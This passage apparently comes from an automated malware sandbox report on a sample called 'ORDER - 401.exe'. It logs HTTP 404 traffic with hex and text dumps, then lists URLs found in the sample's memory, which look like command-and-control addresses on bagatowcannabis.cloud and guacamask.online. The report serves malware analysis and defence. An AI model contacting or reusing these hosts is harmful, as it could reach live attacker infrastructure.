                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:52:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ha9DQOfp5C7NH0AQiLSigswdBUpueIuDV2Lk8mdy58rGmre%2Blp3%2BUyVgnGnTRM6szHLHF7Bqzu5dwsv1Dzoxey%2BNEYFzhfv%2BOzzy8zxrIa9FokncBRthqreJPx2PWDuKakCId0mHBkzL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1e5504ac0943d6-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2299&min_rtt=2299&rtt_var=1149&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=755&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 f5 f8 88 09 44 50 d2 Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDP
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:52:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VPboVlbiIlEiJ77EtGBwuLEPniM%2F9ip%2FaeDZzihrM5c6us%2ByOZAjVBM%2FCuszW6Y3%2B2URMDwYkcIwgSPp6sgLoaibstA0%2FYDU4cBeKEFjNCmjp9aP2rJPrs9Vw7dOhz7L0hZgNKMKCd5x"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1e551539ba0f71-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1484&rtt_var=742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=775&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 f5 f8 88 09 Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTq
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:52:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8PsuVWMpeJZU9m6kSLOWms1e%2FnnocvBiyxkHoNuL7UhvQ753nQNNZLrtXlm5vjsTae21MMXrhWjYvVWa1ssF9AN0D78IGA1RQuHFY5F6VXZpQ1P4RdPXf8FqVPfd952jtEyhfiSt62X7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1e5525eae743bd-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2202&min_rtt=2202&rtt_var=1101&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1792&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 f5 f8 88 09 44 50 d2 a0 7f 62 55 ec Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbU
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:52:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LHSWhAitLfHUaKY6Xkk5cCil0gL%2FBmUyPy53VhpBB1gnMpoLM3ziuZpe8%2FjZtSbhommSqt4khoUpxgVpvOD4XdQa5ED4s64EqvxU%2FPFygzN0tMf7TPjsFIkuYAjmkZXCxBDXZijRVm3c"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1e55369e1e41e1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1629&rtt_var=814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="t
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 14 Dec 2024 12:53:12 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 14 Dec 2024 12:53:15 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 Dec 2024 12:53:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 Dec 2024 12:53:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 Dec 2024 12:53:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 Dec 2024 12:53:30 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: ORDER - 401.exeString found in binary or memory: http://tempuri.org/kviskotekaDbDataSet.xsdcIgra
                Source: ZaZCnGdXtY.exe, 0000000A.00000002.4679125210.00000000055B7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bagatowcannabis.cloud
                Source: ZaZCnGdXtY.exe, 0000000A.00000002.4679125210.00000000055B7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bagatowcannabis.cloud/zmax/
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000005A34000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/px.js?ch=1
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000005A34000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/px.js?ch=2
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000005A34000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/sk-logabpstatus.php?a=MnJENVJwV2lhZW0rV2U4VmdEend6Tm5ucmlLSndTR0pwVHBzV3
